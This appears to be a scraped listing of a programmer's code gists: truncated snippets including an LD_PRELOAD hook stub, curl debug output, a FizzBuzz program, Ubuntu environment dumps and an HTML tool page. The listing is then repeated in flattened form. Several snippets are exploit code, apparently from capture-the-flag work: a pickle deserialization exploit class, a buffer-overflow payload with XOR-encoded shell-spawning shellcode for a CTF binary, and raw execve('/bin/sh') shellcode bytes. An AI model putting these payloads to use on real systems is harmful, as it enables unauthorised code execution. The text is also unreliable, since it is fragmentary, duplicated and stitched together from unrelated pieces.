inaz2

## hook.c
/*
    compile:
    $ gcc -shared -fPIC -o hook.so hook.c -ldl
*/

#define _GNU_SOURCE
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

## gist:7fa449859a35e15b2a8b
$ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/
* STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000)
* About to connect() to www.unoh.net port 80 (#0)
*   Trying 109.201.133.191...
* Adding handle: conn: 0x600069370
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* 0x60002d130 is at send pipe head!
* - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0

## exploiting-pickle.py
import cPickle
import subprocess
import base64
import socket

s = socket.create_connection(('localhost', 5000))

class Exploit(object):
    def __reduce__(self):
        fd = s.fileno()

## fizzbuzz.hs
import Control.Monad

main =
    forM_ [1..100] $ \x -> do
        if x `mod` 15 == 0 then
            putStrLn "fizzbuzz"
        else if x `mod` 5 == 0 then
            putStrLn "buzz"
        else if x `mod` 3 == 0 then
            putStrLn "fizz"

## env.txt
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.5 LTS
Release:        12.04
Codename:       precise

# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
Copyright (C) 2012 Free Software Foundation, Inc.

## env.txt
$ uname -a
Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:        14.04
Codename:       trusty

## oh_my_scanf.py
from roputils import *

p = Proc('./oh_my_scanf')
#p = Proc(host='pwnable.katsudon.org', port=32100)

sc = Shellcode('i386')
buf = 'A' * 28
buf += p32(0x80483e0)                          # push esp; ret
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ')  # elliminate white-space characters for scanf("%s") attack

## result.txt
$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:        14.04
Codename:       trusty

## exploit.py
import struct
import socket
from telnetlib import Telnet

senryu1 = '\x8d\x48\x19\x31\xdb'
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
senryu3 = '\xcd\x80\xff\xe1\x90'

# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

## megrepper.html
<!DOCTYPE html>
<html>
<meta charset="UTF-8">
<title>megrepper</title>
<body>
<canvas id="canvas"></canvas>
<div style="position: fixed; left: 160px; display: inline-block;">
<h1>megrepper</h1>
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag &amp; drop a file on page</pre>
</div>
	/*
	compile:
	$ gcc -shared -fPIC -o hook.so hook.c -ldl
	*/

	#define _GNU_SOURCE
	#include <dlfcn.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netdb.h>
	$ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/
	* STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000)
	* About to connect() to www.unoh.net port 80 (#0)
	* Trying 109.201.133.191...
	* Adding handle: conn: 0x600069370
	* Adding handle: send: 0
	* Adding handle: recv: 0
	* Curl_addHandleToPipeline: length: 1
	* 0x60002d130 is at send pipe head!
	* - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0
	import cPickle
	import subprocess
	import base64
	import socket

	s = socket.create_connection(('localhost', 5000))

	class Exploit(object):
	def __reduce__(self):
	fd = s.fileno()
	import Control.Monad

	main =
	forM_ [1..100] $ \x -> do
	if x `mod` 15 == 0 then
	putStrLn "fizzbuzz"
	else if x `mod` 5 == 0 then
	putStrLn "buzz"
	else if x `mod` 3 == 0 then
	putStrLn "fizz"
	# lsb_release -a
	No LSB modules are available.
	Distributor ID: Ubuntu
	Description: Ubuntu 12.04.5 LTS
	Release: 12.04
	Codename: precise

	# /lib/x86_64-linux-gnu/libc.so.6
	GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
	Copyright (C) 2012 Free Software Foundation, Inc.
	$ uname -a
	Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

	$ lsb_release -a
	No LSB modules are available.
	Distributor ID: Ubuntu
	Description: Ubuntu 14.04.1 LTS
	Release: 14.04
	Codename: trusty
	from roputils import *

	p = Proc('./oh_my_scanf')
	#p = Proc(host='pwnable.katsudon.org', port=32100)

	sc = Shellcode('i386')
	buf = 'A' * 28
	buf += p32(0x80483e0) # push esp; ret
	buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # elliminate white-space characters for scanf("%s") attack
	$ uname -a
	Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

	$ lsb_release -a
	No LSB modules are available.
	Distributor ID: Ubuntu
	Description: Ubuntu 14.04.1 LTS
	Release: 14.04
	Codename: trusty
	import struct
	import socket
	from telnetlib import Telnet

	senryu1 = '\x8d\x48\x19\x31\xdb'
	senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
	senryu3 = '\xcd\x80\xff\xe1\x90'

	# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
	shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
	<!DOCTYPE html>
	<html>
	<meta charset="UTF-8">
	<title>megrepper</title>
	<body>
	<canvas id="canvas"></canvas>
	<div style="position: fixed; left: 160px; display: inline-block;">
	<h1>megrepper</h1>
	<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag & drop a file on page</pre>
	</div>